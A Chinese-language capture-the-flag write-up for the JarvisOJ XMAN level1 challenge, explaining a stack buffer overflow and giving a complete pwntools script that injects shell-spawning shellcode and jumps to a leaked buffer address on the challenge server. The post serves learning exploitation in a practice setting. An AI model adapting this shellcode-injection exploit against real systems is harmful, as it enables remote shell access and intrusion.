JarvisOj [XMAN]level-1

思路WP

  • 同樣的使用ida打開挠锥,由main函數(shù)開始众羡,調(diào)用了vulner_function,也同樣建立了buf字符串buf到ret的偏移為(0x4-(-0x88)蓖租,一共為0x92粱侣。
main2.png
vuler.png
buff.png
buff-r.png
  • 但同樣的,read函數(shù)向buf中輸入的數(shù)據(jù)最大可為0x100蓖宦。同樣屬于棧溢出齐婴,但該題并沒有為我們提供callsteam函數(shù),因此需要我們自行寫稠茂,但因為pwntool的強大柠偶,我們可以使用pwn中的asm(shellcraft.sh())函數(shù)來直接獲取執(zhí)行。
  • system(“/bin/sh”)匯編代碼所對應(yīng)的機器碼睬关,但此時我們還需要得到buf的地址诱担,經(jīng)過調(diào)試可以知道當(dāng)與服務(wù)器進行鏈接后,在服務(wù)器返回"What's this:%p?\n"后會有加上一個地址共螺,由代碼邏輯可知该肴,這個地址就是buf的地址,由圖片知其位置在[14:-2].
level1返回地址.png
  • 因此我們將之截取藐不,并保存在buf_addr中匀哄。因此我們把shellcode的代碼從buf的起始地址開始填充,然后buf中剩下的地址有a填充雏蛮,因為我們最后需要調(diào)用shellcode代碼涎嚼,因此再加上buf_addr(記得將之字符化)

代碼

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')

![level1.png](https://upload-images.jianshu.io/upload_images/8384623-ce3277246964f144.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
shellcode = asm(shellcraft.sh())
#io = process('./level1')
io = remote('pwn2.jarvisoj.com', 9877)
text = io.recvline()[14: -2]
#print text[14:-2]
buf_addr = int(text, 16)

payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()
io.close()

解釋

recvline(keepends=True) : 接收一行,keepends為是否保留行尾的\n
int()表示將得到的地址轉(zhuǎn)換為16進制數(shù)

結(jié)果

level1.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末挑秉,一起剝皮案震驚了整個濱河市法梯,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌犀概,老刑警劉巖立哑,帶你破解...
    沈念sama閱讀 222,183評論 6 516
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異姻灶,居然都是意外死亡铛绰,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,850評論 3 399
  • 文/潘曉璐 我一進店門产喉,熙熙樓的掌柜王于貴愁眉苦臉地迎上來捂掰,“玉大人敢会,你說我怎么就攤上這事≌庀” “怎么了鸥昏?”我有些...
    開封第一講書人閱讀 168,766評論 0 361
  • 文/不壞的土叔 我叫張陵,是天一觀的道長姐帚。 經(jīng)常有香客問我吏垮,道長,這世上最難降的妖魔是什么罐旗? 我笑而不...
    開封第一講書人閱讀 59,854評論 1 299
  • 正文 為了忘掉前任惫皱,我火速辦了婚禮,結(jié)果婚禮上尤莺,老公的妹妹穿的比我還像新娘。我一直安慰自己生棍,他們只是感情好颤霎,可當(dāng)我...
    茶點故事閱讀 68,871評論 6 398
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著涂滴,像睡著了一般友酱。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上柔纵,一...
    開封第一講書人閱讀 52,457評論 1 311
  • 那天缔杉,我揣著相機與錄音,去河邊找鬼搁料。 笑死或详,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的郭计。 我是一名探鬼主播霸琴,決...
    沈念sama閱讀 40,999評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼昭伸!你這毒婦竟也來了梧乘?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,914評論 0 277
  • 序言:老撾萬榮一對情侶失蹤庐杨,失蹤者是張志新(化名)和其女友劉穎选调,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體灵份,經(jīng)...
    沈念sama閱讀 46,465評論 1 319
  • 正文 獨居荒郊野嶺守林人離奇死亡仁堪,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,543評論 3 342
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了各吨。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片枝笨。...
    茶點故事閱讀 40,675評論 1 353
  • 序言:一個原本活蹦亂跳的男人離奇死亡袁铐,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出横浑,到底是詐尸還是另有隱情剔桨,我是刑警寧澤,帶...
    沈念sama閱讀 36,354評論 5 351
  • 正文 年R本政府宣布徙融,位于F島的核電站洒缀,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏欺冀。R本人自食惡果不足惜树绩,卻給世界環(huán)境...
    茶點故事閱讀 42,029評論 3 335
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望隐轩。 院中可真熱鬧饺饭,春花似錦、人聲如沸职车。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,514評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽悴灵。三九已至扛芽,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間积瞒,已是汗流浹背川尖。 一陣腳步聲響...
    開封第一講書人閱讀 33,616評論 1 274
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留茫孔,地道東北人叮喳。 一個月前我還...
    沈念sama閱讀 49,091評論 3 378
  • 正文 我出身青樓,卻偏偏與公主長得像银酬,于是被迫代替她去往敵國和親嘲更。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,685評論 2 360

推薦閱讀更多精彩內(nèi)容

  • Return-Oriented-Programming(ROP FTW) Author: Saif El-Sher...
    RealSys閱讀 3,326評論 0 2
  • 大家好揩瞪,我是007-7751陳超群赋朦。 受戰(zhàn)友陳孝康戰(zhàn)友的邀請,我接受了組織的神秘任務(wù)李破,擔(dān)任8月份的值月生宠哄,為大家做...
    爬行中的小蝸牛閱讀 276評論 1 2
  • 午后,有些困頓嗤攻,有些疲倦毛嫉,看了下案頭的小吃,巧克力餅干妇菱,拿起又放下了承粤。因為這一口甜爽過后暴区,余下的超多熱量,對于...
    麥麥大長腿閱讀 600評論 1 6
  • 顏青【廈門千葉集貿(mào)易有限公司】 【日精進打卡第134天】 【知~學(xué)習(xí)】 《六項精進》大綱2遍共270遍 《大學(xué)》開...
    千葉集青閱讀 254評論 0 0